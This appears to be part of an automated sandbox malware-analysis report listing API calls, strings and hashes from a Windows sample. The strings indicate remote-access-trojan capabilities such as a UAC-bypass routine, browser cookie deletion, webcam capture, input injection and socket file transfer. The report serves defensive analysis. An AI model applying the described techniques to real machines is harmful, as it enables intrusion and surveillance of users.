                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: tcp$udp
                                              • API String ID: 0-3725065008
                                              • Opcode ID: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                              • Instruction ID: 4fb2fbaa1818e082f2863e0a7c91e4ace7fe62ed23b491eff3584b955907a2f3
                                              • Opcode Fuzzy Hash: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                              • Instruction Fuzzy Hash: FC7197706083028FDB248F55D4817ABB7E4AFC8355F20482FF88697351E778DE858B9A
                                              APIs
                                                • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                              • _free.LIBCMT ref: 00444E87
                                              • _free.LIBCMT ref: 00444E9E
                                              • _free.LIBCMT ref: 00444EBD
                                              • _free.LIBCMT ref: 00444ED8
                                              • _free.LIBCMT ref: 00444EEF
                                              • API ID: _free$AllocateHeap
                                              • String ID: KED$v%(/
                                              APIs
                                              • __Init_thread_footer.LIBCMT ref: 004018BE
                                              • ExitThread.KERNEL32 ref: 004018F6
                                              • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EE0,00000000), ref: 00401A04
                                                • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                              • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                              • String ID: PkG$XMG$NG$NG
                                              APIs
                                              • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EE0,00465FB4,?,00000000,00408037,00000000), ref: 00407A00
                                              • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00408037,00000000,?,?,0000000A,00000000), ref: 00407A48
                                                • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                              • CloseHandle.KERNEL32(00000000,?,00000000,00408037,00000000,?,?,0000000A,00000000), ref: 00407A88
                                              • MoveFileW.KERNEL32(00000000,00000000), ref: 00407AA5
                                              • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AD0
                                              • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AE0
                                                • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(00000000,000000FF,?,00474EF8,00404C49,00000000,00000000,00000000,?,00474EF8,?), ref: 00404BA5
                                                • Part of subcall function 00404B96: SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                              • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                              • String ID: .part
                                              Strings
                                              • 8)[, xrefs: 004076DF
                                              • hhh-AQVE0Z, xrefs: 00407715
                                              • C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, xrefs: 004076FF
                                              • xdF, xrefs: 004076E4
                                              • API ID:
                                              • String ID: 8)[$C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe$hhh-AQVE0Z$xdF
                                              APIs
                                              • SendInput.USER32 ref: 00419A25
                                              • SendInput.USER32(00000001,?,0000001C,00000000), ref: 00419A4D
                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A74
                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A92
                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AB2
                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AD7
                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AF9
                                              • SendInput.USER32(00000001,00000000,0000001C), ref: 00419B1C
                                                • Part of subcall function 004199CE: MapVirtualKeyA.USER32(00000000,00000000), ref: 004199D4
                                              • API ID: InputSend$Virtual
                                              • String ID:
                                              • API ID:
                                              • String ID: v%(/
                                              APIs
                                              • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413B26
                                              • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00413BC6
                                              • API ID: Enum$InfoQueryValue
                                              • String ID: [regsplt]$xUG$TG
                                              APIs
                                              • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                              • _free.LIBCMT ref: 0044943D
                                                • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                              • _free.LIBCMT ref: 00449609
                                              • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                              • String ID: v%(/
                                              • API ID: _free
                                              • String ID: v%(/
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92), ref: 004511F9
                                              • __alloca_probe_16.LIBCMT ref: 00451231
                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?), ref: 00451282
                                              • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?,00000002,00000000), ref: 00451294
                                              • __freea.LIBCMT ref: 0045129D
                                                • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                              • String ID: v%(/
                                              APIs
                                                • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00413622
                                                • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                                              • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BFA6
                                              • PathFileExistsA.SHLWAPI(?), ref: 0040BFB3
                                              • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                              • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f00b1ad24c7174d2716471ab0982682010261559510d9071992da7a4292711ea
                                              • Instruction ID: d4e598e7927038c57750db0ba161657e9615562456f8c919f0676739ef068bdb
                                              • Opcode Fuzzy Hash: f00b1ad24c7174d2716471ab0982682010261559510d9071992da7a4292711ea
                                              • Instruction Fuzzy Hash: 931127B2504214BBEB216F768C05D1F7A5CEB86726B52062EFD55C7292DA3CCC0186A8
                                              APIs
                                                • Part of subcall function 00450CC1: _free.LIBCMT ref: 00450CEA
                                              • _free.LIBCMT ref: 00450FC8
                                                • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                              • _free.LIBCMT ref: 00450FD3
                                              • _free.LIBCMT ref: 00450FDE
                                              • _free.LIBCMT ref: 00451032
                                              • _free.LIBCMT ref: 0045103D
                                              • _free.LIBCMT ref: 00451048
                                              • _free.LIBCMT ref: 00451053
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast
                                              • String ID:
                                              • API String ID: 776569668-0
                                              • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                              • Instruction ID: 345e916fd15b447c36d88a7a8914fd19e4c3e0710e9d23c2e9f19f8556552687
                                              • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                              • Instruction Fuzzy Hash: C111D231402704AAE621BB72CC03FCB779CAF03304F454D2EBEA967153C7ACB4185654
                                              APIs
                                              • std::_Lockit::_Lockit.LIBCPMT ref: 004111AB
                                              • int.LIBCPMT ref: 004111BE
                                                • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                              • std::_Facet_Register.LIBCPMT ref: 004111FE
                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00411207
                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00411225
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                              • String ID: (mG
                                              • API String ID: 2536120697-4059303827
                                              • Opcode ID: 1b5c7adf1a629fe2bc242511ea8b9d41abd54e1fd7f2f3a966b13196985dc313
                                              • Instruction ID: b4facbf35e110c19f3eede998f69f9310dce987b63f856d60fe44c7d5fb17b17
                                              • Opcode Fuzzy Hash: 1b5c7adf1a629fe2bc242511ea8b9d41abd54e1fd7f2f3a966b13196985dc313
                                              • Instruction Fuzzy Hash: 42112732900114A7CB14EB9AD8018DEB7699F44364F11456FF904F72E1DB789E45CBC8
                                              APIs
                                              • GetLastError.KERNEL32(?,?,0043A3D1,0043933E), ref: 0043A3E8
                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A3F6
                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40F
                                              • SetLastError.KERNEL32(00000000,?,0043A3D1,0043933E), ref: 0043A461
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLastValue___vcrt_
                                              • String ID:
                                              • API String ID: 3852720340-0
                                              • Opcode ID: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                              • Instruction ID: 228fd8bb196f6ae1284969ba5442ea73dc67404c1df350b3d70410c0baad6fb0
                                              • Opcode Fuzzy Hash: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                              • Instruction Fuzzy Hash: 87019C322483515EA61027797C8A62B2648EB293B9F30523FF518805F1EF984C90910D
                                              APIs
                                              • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe), ref: 0040760B
                                                • Part of subcall function 00407538: _wcslen.LIBCMT ref: 0040755C
                                                • Part of subcall function 00407538: CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                              • CoUninitialize.OLE32 ref: 00407664
                                              Strings
                                              • C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, xrefs: 004075EB, 004075EE, 00407640
                                              • [+] ShellExec success, xrefs: 00407649
                                              • [+] before ShellExec, xrefs: 0040762C
                                              • [+] ucmCMLuaUtilShellExecMethod, xrefs: 004075F0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: InitializeObjectUninitialize_wcslen
                                              • String ID: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                              • API String ID: 3851391207-2987795546
                                              • Opcode ID: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                              • Instruction ID: e4e7d1672fbddd81374e29e92f863be8f9bad83f72bb7a306ddb251afa86686e
                                              • Opcode Fuzzy Hash: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                              • Instruction Fuzzy Hash: 4501D272B087116BE2246B65DC4AF6B3748DB41B25F11053FF901A62C1EAB9FC0146AB
                                              APIs
                                              • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BB18
                                              • GetLastError.KERNEL32 ref: 0040BB22
                                              Strings
                                              • UserProfile, xrefs: 0040BAE8
                                              • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAE3
                                              • [Chrome Cookies not found], xrefs: 0040BB3C
                                              • [Chrome Cookies found, cleared!], xrefs: 0040BB48
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: DeleteErrorFileLast
                                              • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                              • API String ID: 2018770650-304995407
                                              • Opcode ID: 40cbd1d017226246a01c6e55be9682f761922b1e96e2188b9bd7b4daff8d9f2f
                                              • Instruction ID: 5dee569c6883bfd73109a670bb68234af0f28e4caad238985ba957b2c74b96e7
                                              • Opcode Fuzzy Hash: 40cbd1d017226246a01c6e55be9682f761922b1e96e2188b9bd7b4daff8d9f2f
                                              • Instruction Fuzzy Hash: 5B01DF71A402055BCA04B7B6CC1B9BE7B24E922704B50017FF502726D6FE3E5D0986CE
                                              APIs
                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 004433FA
                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044340D
                                              • FreeLibrary.KERNEL32(00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 00443430
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AddressFreeHandleLibraryModuleProc
                                              • String ID: CorExitProcess$mscoree.dll$v%(/
                                              • API String ID: 4061214504-1096476586
                                              • Opcode ID: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                              • Instruction ID: d7bd46dfab834bb5d48edea7818df211002af85bf4a2e706b61bd78119be3437
                                              • Opcode Fuzzy Hash: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                              • Instruction Fuzzy Hash: 4EF04931900208FBDB159F65DC45B9EBF74EF04753F0040A5F805A2251DB758E40CA99
                                              APIs
                                              • __allrem.LIBCMT ref: 0043ACE9
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD05
                                              • __allrem.LIBCMT ref: 0043AD1C
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD3A
                                              • __allrem.LIBCMT ref: 0043AD51
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD6F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                              • String ID:
                                              • API String ID: 1992179935-0
                                              • Opcode ID: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                              • Instruction ID: c7cd181284538591ee8af1586cca3d38175ba7b34bac8e5aa56d350f01832762
                                              • Opcode Fuzzy Hash: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                              • Instruction Fuzzy Hash: 5F815972A40B05ABE7209F29CC41B6FB3A99F48324F24152FF591D67C1E77CE910875A
                                              APIs
                                              • Sleep.KERNEL32(00000000,0040D29D), ref: 004044C4
                                                • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: H_prologSleep
                                              • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                              • API String ID: 3469354165-3054508432
                                              • Opcode ID: fef66e343663587799a4fb7e411b7be832f70b8e55665d4bb62892141d3c40a9
                                              • Instruction ID: df1e58e957a7578ae16e417911435538e3341edc64810737793f4aa4f8849b6c
                                              • Opcode Fuzzy Hash: fef66e343663587799a4fb7e411b7be832f70b8e55665d4bb62892141d3c40a9
                                              • Instruction Fuzzy Hash: A751E171A042106BCA14FB369D0A66E3755ABC4748F00443FFA0A676E2DF7D8E45839E
                                              APIs
                                                • Part of subcall function 004117D7: SetLastError.KERNEL32(0000000D,00411D57,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 004117DD
                                              • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411D72
                                              • GetNativeSystemInfo.KERNEL32(?,0040D2DD,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411DE0
                                              • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411E04
                                                • Part of subcall function 00411CDE: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CEE
                                              • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E4B
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E52
                                              • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F65
                                                • Part of subcall function 004120B2: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,?), ref: 00412122
                                                • Part of subcall function 004120B2: HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 00412129
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                              • String ID:
                                              • API String ID: 3950776272-0
                                              • Opcode ID: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                                              • Instruction ID: da58ab861bd0a84ec3871346ef31e8b8814b9d9500880b3a3e1890ad13292c25
                                              • Opcode Fuzzy Hash: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                                              • Instruction Fuzzy Hash: F761A270700611ABCB209F66C981BAA7BA5AF44704F14411AFF05877A2D77CE8C2CBD9
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: __cftoe
                                              • String ID:
                                              • API String ID: 4189289331-0
                                              • Opcode ID: d4cf2da0f410fbcc7cbee81c0db44e16d3fe49bd9b5005f3a7d0ddff8059c7c7
                                              • Instruction ID: b93b8478136607885b926496a305f1bfb884a7f6acf724e610c81469f19cb9e5
                                              • Opcode Fuzzy Hash: d4cf2da0f410fbcc7cbee81c0db44e16d3fe49bd9b5005f3a7d0ddff8059c7c7
                                              • Instruction Fuzzy Hash: 2551FD72500605ABFF209B598C81EAF77A8EF45334F25421FF915A6293DB3DD900C66D
                                              APIs
                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD19
                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A41F,00000000), ref: 0041AD2D
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD3A
                                              • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD6F
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD81
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD84
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
